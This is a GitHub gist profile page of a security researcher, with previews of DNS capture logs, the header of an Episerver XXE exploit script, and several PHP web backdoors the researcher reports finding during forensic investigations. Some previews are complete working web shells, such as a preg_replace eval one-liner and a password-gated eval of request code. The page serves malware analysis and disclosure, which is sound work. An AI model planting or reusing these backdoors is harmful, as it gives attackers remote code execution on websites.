Skip to content

Instantly share code, notes, and snippets.

🏠
Working from home

Jonas Lejon jonaslejon

🏠
Working from home
Block or report user

Report or block jonaslejon

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@jonaslejon
jonaslejon / dns-resolvers.txt
Last active Jun 25, 2018
DNS Resolvers with tcpdump output
View dns-resolvers.txt
## Resolver 1 Bahnhof
21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49)
@jonaslejon
jonaslejon / episploit.py
Last active Aug 28, 2018
Episerver XXE Vulnerability - Exploit Episploit
View episploit.py
#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
##
## Usage: ./episploit.py <target> [file-to-read]
@jonaslejon
jonaslejon / wp-uninstall.php
Created Apr 8, 2018
WordPress backdoor found in file wp-uninstall.php
View wp-uninstall.php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
@jonaslejon
jonaslejon / _input__test.php.
Created Oct 10, 2017
WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/
View _input__test.php.
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
@jonaslejon
jonaslejon / wp-blog-header.php
Last active Jul 7, 2018
Malware found on WordPress installation. This is the deobfuscated version
View wp-blog-header.php
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
@jonaslejon
jonaslejon / file-upload.php
Created Feb 10, 2016
PHP file upload backdoor
View file-upload.php
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
@jonaslejon
jonaslejon / php-preg-replace-backdoor.php
Created Feb 10, 2016
Short PHP backdoor using preg_replace. Found during forensic investigation
View php-preg-replace-backdoor.php
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');
@jonaslejon
jonaslejon / PHP-cookie-backdoor.php
Last active Dec 13, 2017
This is a PHP COOKIE backdoor that was found during a forensic investigation
View PHP-cookie-backdoor.php
@jonaslejon
jonaslejon / web-backdoor.php
Created Jan 11, 2016
Web PHP Malware found during forensic investigation
View web-backdoor.php
<?php
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%
@jonaslejon
jonaslejon / php-upload.php
Created Jan 8, 2016
PHP file upload backdoor found during forensic investigation
View php-upload.php
<?php
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "236c985403e7e1";
$part = "450be30e0288de41b6";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>
You can’t perform that action at this time.